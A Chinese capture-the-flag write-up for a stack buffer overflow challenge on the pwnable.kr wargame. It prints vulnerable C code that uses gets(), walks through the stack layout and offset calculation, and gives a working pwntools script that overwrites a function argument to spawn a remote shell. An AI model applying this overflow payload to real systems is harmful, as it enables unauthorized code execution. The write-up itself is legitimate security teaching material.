题目不多讲,直接贴代码,如果不会这些个过程看前面教程
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
题目看上去很简单,实际上也不难,只要我们懂点知识,栈溢出的知识,
临时变量存放地点(char overflowme[32]) |
ebp存放地点(栈底,函数执行都要保存栈底) |
call返回地址存放地点(方便执行下一条指令) |
形参存放地点(key) |
栈的具体结构需要你们自己去了解,而我就这题目画出的栈区图,具体我已经给出来了
用IDA反汇编查看了这个文件,s是byte类型的,也就是char类型,很容易推到他就是那个数组,而地点他也已经标明了,-2ch,h是16进制的意思,2c换成10进制便是44,而我画出的栈区图里还有两个地址,8个字节,合起来就是52个字节,前面52个字节用随便字母填充,然后将形参key用0xcafebabe覆盖,具体python代码如下
bof.py buffers
1 #!/usr/bin/env python
2 # coding=utf-8
3 from pwn import *
4 socket=remote('pwnable.kr',9000)
5 socket.sendline('A' * 52 + '\xbe\xba\xfe\xca')
6 socket.interactive()
这里有条新命令,remote远程控制,interactive是实时反应,还有不习惯小端模式的话,可以用p32(0xcafebabe)这个命令,将其转化为字符串,不过这样写可以深刻理解内存中怎么存的